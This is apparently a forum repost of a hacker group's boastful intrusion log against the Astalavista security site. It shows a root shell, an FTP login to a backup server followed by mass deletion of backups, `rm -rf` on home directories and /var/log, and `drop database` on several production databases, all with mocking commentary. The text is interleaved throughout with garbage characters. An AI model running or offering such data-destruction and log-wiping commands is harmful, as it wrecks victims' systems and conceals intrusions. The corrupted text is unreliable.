1 E' d2 m6 [7 B' b  Z" R| iss_summary      | iss_description                                                                             |( o/ a1 r# j4 C3 u8 P
+——————+———————————————————————————————+
. e( v. d+ J7 l# ~9 C9 g| Website guidance | Virtual Girl which guides you trought the website.& Q4 P- m5 C3 R/ S" b( }
/ P* G% f0 o. F" {& a4 b
We need a girl with who you can ( talk )!!!
  m0 F& m! e! H- c8 O" S! o& @( IAlso for the News!
4 B3 b5 _3 I/ R2 u4 JSo my suggestion is a girl who read you the news loud if you like!3 J: P% Y! b5 E  W! O, O* ^! E) ~
you can choose between read yourselfe or she read it for you or both!  Z1 s/ R3 `/ S
; e3 Y! W! C% X' l3 g$ D# k
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!3 s0 ]% {$ ]" J' Q8 b

1 x6 I0 t) s9 ]Have a look on the example girls!!
/ g1 [: N4 B+ x9 `7 h! K$ w! u8 n% h3 h3 s) W( J
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
2 B2 m+ j1 M# w  t/ c: D) ]/ ]! c  d" }+ y& q% x
or that
+ O% j1 e: ^6 |9 L0 [: t6 w& |6 ~
" M" O& I1 `6 A" O5 D8 n( _; O: w链接标记[url]http://www.yellostrom.de/[/url]& E* X8 J  h9 }

' C* w2 k& z; f' I& g8 T|
/ G  k# D6 X. c! D2 q; D+ G) h9 B+——————+———————————————————————————————+
: n  M, Z7 _: H) N0 B  l1 row in set (0.00 sec)
/ @# `% Q% n% U6 b) x) y1 E) \
7 Q2 |- P% T; o! K! n# l+ D// ha ha.
! Z  r5 @- Y8 u8 |) n) G5 c9 |* d
  a' b# K! S: w1 emysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
. M$ W( C" R' s8 [+————————–+———————————————————————————————————–+: ^8 k& z% ~. y9 C" H
| iss_summary              | iss_description                                                                                           |
* V: p( e% @: t( P) Y1 E+————————–+———————————————————————————————————–+! G6 ]% t7 ^6 F: C& O# ^2 d
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |
" @! y' O: q3 O! }& }+————————–+———————————————————————————————————–+( h1 Q3 w2 T$ |4 w4 N# x1 e. R
1 row in set (0.00 sec)
2 e8 J6 Q' j) s7 j* Z, O
+ T' @8 o3 w# z0 j) M// LOL.
  l1 Q( j  p' V! |# E/ E$ B: J7 j* S9 b4 K# ]+ a9 ^& v
mysql> exit
3 r% V+ K3 R( @. v7 @, s& qBye
0 n# W/ R6 j. d8 _+ j3 C+ Z( E! y0 D+ e
sh-3.2# ftp 212.254.194.163/ \" K5 x4 p! m+ ^& S% G
Connected to 212.254.194.163.6 f- ?; t' Q5 k3 W+ Y; z
220 BackupCOM_VW FTP server ready.
! y4 P/ w* L# S$ U" {504 AUTH: security mechanism ‘GSSAPI’ not supported.
9 A4 Z' Z# A2 x$ h. @. N$ o5 g; l504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
. Y- a: n9 O+ r$ A7 ^3 o8 QKERBEROS_V4 rejected as an authentication type, J* y! P' \* n3 k( D$ I
Name (212.254.194.163:root): astalavista.com
& t" p* `) f% l+ R: g4 x2 y331 Password required for astalavista.com./ w5 \4 @: b4 @$ w( V" U
Password:- [( D$ a! n1 k" W+ x
230 User astalavista.com logged in.
* ]% I% f! w$ v( J6 i# xRemote system type is UNIX.5 n% E! [+ C7 f+ P! v2 ^5 u! b  i  r
Using binary mode to transfer files.+ X  }. K9 H- D9 _6 B: x( ^
ftp> ls -la2 p- `% e0 u& u" j. l' E
227 Entering Passive Mode (212,254,194,163,2,188)
2 \: A' l7 d" u8 i4 H7 \2 Y8 M150 Opening BINARY mode data connection for ‘file list’.4 Z2 J; Q$ l7 n" U- \" q3 v+ X4 g( i
dr-x——   1 root users         4096 Jun  4 06:13 astalavista.com% q# |; ~! @! G+ K( x. y2 S
226 Transfer complete.! A) Z; U1 q) v
ftp> cd astalavista.com0 l) U# S* Y4 l" g" X$ N+ q9 E' Y
250 CWD command successful.
$ u- R: n6 t& rftp> ls -la
7 d; D3 M' f! k& _3 k+ P4 o227 Entering Passive Mode (212,254,194,163,2,189)4 Y: R& O5 @7 J8 e1 D2 _
150 Opening BINARY mode data connection for ‘file list’.
9 C( x( ~5 z0 k, O. M) u7 i4 u-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar# L* X. P* K, h9 B! M' i
-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
8 \: o9 Z1 ^4 b1 w2 g4 B-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
6 G' p1 M0 E) j% w-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar
& }' _$ o% O' W3 G-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar
: `1 ?( D- N% g- r) z! L[snip]
$ Y+ Z$ a6 p1 A$ [9 z226 Transfer complete.
) z2 \' I. P3 rftp> mdelete *: w' K; p+ O9 |# Q- ]8 }3 ^
ftp> ls -la) P3 m) ^# N: v5 ]% S- C5 F4 c6 E
227 Entering Passive Mode (212,254,194,163,2,193)" z2 |" S/ F' f- p. X
150 Opening BINARY mode data connection for ‘file list’.$ S  w% ~4 T" F2 d/ z: g
226 Transfer complete.
% w  ~8 I! V) K+ [0 fftp>
$ s; q' @, {) k1 G( J) W9 D* m0 X, K, w! e6 \
sh-3.2# cd /home
) n1 a/ T+ L% Q9 _$ C( zsh-3.2# ls -la
+ ~) a+ |8 f: e5 rtotal 120
3 v- ]6 S2 z9 ~& \7 V& J. j- w/ ?drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .9 x9 V; x- I% t9 u6 P" f& n
drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
6 M$ q8 q+ h* x+ ?' N1 Tdrwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
* m. h$ {& h. [" p! N  G-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group
# _6 W: C& A* v% _/ x( P# X8 e- |-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user: k3 G1 x  N. }8 T
drwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet- L% F( K/ d- D! y! [' K" ?- K0 S% C
drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup6 i) ]. Y5 P; n/ K
drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
2 r) j' a0 L2 xdrwx–x–x 10 com     com      4096 Apr 28 12:40 com
0 a6 T, f6 h( ?% Adrwxr-xr-x  2 root    root     4096 May 17  2007 ftp8 u  q2 b5 \; m2 P3 z# M. V! T
drwx——  3 jon     jon      4096 Sep 21  2007 jon/ A3 K% u' _" G& N: t
drwx——  2 root    root    16384 Sep 11  2007 lost+found5 G  U8 [# ^9 @8 q) U
drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
/ b2 K+ y1 }0 e4 bdrwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
+ K7 |, P: z/ E+ W5 o5 b; x+ M- m4 Odrwx——  2 jon     jon      4096 Sep 15  2007 test% B- d, s8 G2 T* ^
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
- y* z8 \% a; l0 K( \' K: }2 U8 ?: k4 E, c1 `5 ]4 E: f
sh-3.2# rm -rf backup/8 E. x4 _# p4 a, m6 t' h; D
sh-3.2# rm -rf backup.14161/3 T# O/ C& i8 e" b
sh-3.2# rm -rf ftp/
0 Q( H# `% g4 a9 |6 J) z, }. xsh-3.2# rm -rf jon/
; Q$ B( {8 u- csh-3.2# rm -rf my/
% q# k7 M- L+ _8 @6 [8 F- q; Ksh-3.2# rm -rf mysqldata/5 j- Z# G4 `& p; D6 G7 }
sh-3.2# rm -rf test/
( N, }% G8 }9 D$ B1 s# Esh-3.2# rm -rf tmp/: {* h/ L5 W9 V; H& l9 f
sh-3.2# cd ~( q/ G% u9 P! J3 U
sh-3.2# rm -rf *! @7 G8 n+ }! [% n
sh-3.2# rm -rf /var/log/& c* b& O6 y% u2 A6 Z/ M' O/ n0 P8 i
rm: cannot remove directory `/var/log//proftpd’: Directory not empty5 m/ B( S. A/ j  r
sh-3.2# rm -rf /home/*
  ]" I5 V8 k; Ysh-3.2# mysql
' \+ R* b1 ^& _: Y: HWelcome to the MySQL monitor.  Commands end with ; or \g.
6 N7 R$ o# N) xYour MySQL connection id is 4071560 A2 N8 I; g4 E$ a: F* Z! B
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
+ @% f. C0 H; F8 u+ i1 A9 c* ?, I& k" f2 _
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
/ h5 M3 g/ F0 Y* B* V. d9 J
, g7 c9 H0 ]3 Y% H  l6 Amysql> show databases;8 ^! T6 J8 L5 K
+———————–+
6 X7 ~" }+ Z3 Q# \| Database              |1 m: P* E: G5 c& H# H/ j1 c
+———————–+" K6 Q- P0 {% J  m- _0 Q: x
| information_schema    |4 \( u! J+ Y2 p8 U9 U/ a
| astanet_ads           |0 m% J9 I5 F4 }
| astanet_mailing_lists |/ U1 W/ d* P; E
| astanet_mediawiki     |
& @; i/ M" w' ~" [8 Y| astanet_membersystem  |8 v. F. a2 {( z3 o* P/ f
| com_contrexx          |4 D- ~& L% Q- @; m, S* ?
| com_contrexx2         |" P4 J$ X/ M% O0 w# j
| com_contrexx2_live    |
% A# u" |: `$ P; V3 e$ Y( D2 V# {| da_roundcube          |" V- |  _6 m5 n
| dolphin               |7 F0 V7 M+ R- F! l3 i4 M
| ideapool              |
# C) |- H- s, g2 _/ s$ ]$ S| mysql                 |8 j4 S7 Y+ l, ^9 N* x
| test                  |; M: w4 {" Z: @6 Y
| yourmaster            |3 C- G% v. e/ Q, L
+———————–+$ v6 I0 a' G0 G; M9 c
14 rows in set (0.03 sec): j* P" w, Y+ d8 o* V( ^3 J
& y, `1 P6 U" U# P/ r
mysql> drop database astanet_membersystem;; F' `4 C7 r# i+ ^/ K+ U2 U: d6 ^: Z
droQuery OK, 46 rows affected (0.81 sec)
$ v4 V2 y/ o2 h/ r# v7 V1 W' n; i4 O" j" a& i' [) z( u& E% E# V" H
mysql> drop database com_contrexx;) _, S$ F  ]* D* |/ l3 r
Query OK, 211 rows affected (2.72 sec), [7 x1 T. ]! }2 C
: S6 V3 s3 S" X9 K  m' x" s
mysql> drop database com_contrexx2;. j! @( v: P  ^
Query OK, 237 rows affected (2.23 sec)$ p8 F& E# M9 y

; {' P) ]0 s* mmysql> drop database com_contrexx2_live;/ K) D. U/ j4 I! S, s
Query OK, 227 rows affected (7.63 sec)
7 u/ M2 H0 Y& ~* _9 J0 y6 w/ h8 a: J) @" l* e
mysql> drop database ideapool;
6 {; f, ]* W! }0 a+ i- [! q3 t" A: m  [6 hQuery OK, 69 rows affected (0.19 sec)
7 C( z2 p# N; R9 U! {9 x. ~  `
, L/ N/ R6 K9 V+ e2 _1 c7 H. o9 Cmysql> drop database yourmaster;: g3 ?8 B. V5 [; ]! K
Query OK, 158 rows affected (0.55 sec)
! i* j9 w  L$ ^6 ^/ G  W3 N3 l9 F/ @. x( \# I) _5 p
mysql> drop database astanet_ads;3 X  m7 Z+ l, C; P( O
Query OK, 9 rows affected (0.11 sec); y9 }* N) J6 P" c
& a7 C. r, z6 U+ B9 u
mysql> drop database astanet_mailing_lists;
7 {# n( X$ c' |! VQuery OK, 24 rows affected (1.47 sec)9 X& K. p- M: s- g7 x9 @

. R4 |5 u& t) g+ Jmysql> drop database astanet_mediawiki;" Y. G1 e% g: X$ T: p, m6 a
Query OK, 31 rows affected (0.51 sec)
" J+ m# z4 E, ]# F. d
& g7 D# X; X, M7 ~. x4 g) Wmysql> show databases;# g6 F) M6 C" u* o3 r9 h' q
+——————–+
/ H# G' ]% _; c- ~: E( C| Database           |
" _5 m$ w& D' |8 b+——————–+) m% |0 |8 t- c: v$ `: k3 c
| information_schema |
: g4 n7 I! C( C: _1 Z5 }| da_roundcube       |
4 L) V7 u+ y+ o| dolphin            |
1 e4 ?" D0 R! o6 @# v$ ?; }( S| mysql              |5 j* c- }3 t+ r: p  F/ B5 d* J
| test               |
7 M; j7 h6 s6 z9 e3 R  [* A+——————–+
, h2 D; s, I/ {" g' \5 rows in set (0.00 sec)
( x4 i" R! Z* u) X; d! A4 w8 [# a! z5 T. f1 M
What a journey! We’re not sure exactly why the “Terminator” had any influence on+ i; N6 s6 G7 f6 h
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the, |: ~$ K3 b6 [+ i8 E: {) s
wrong to say this pack of morons *wont be back*.
  {& z8 O9 O; q! L0 _4 I



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2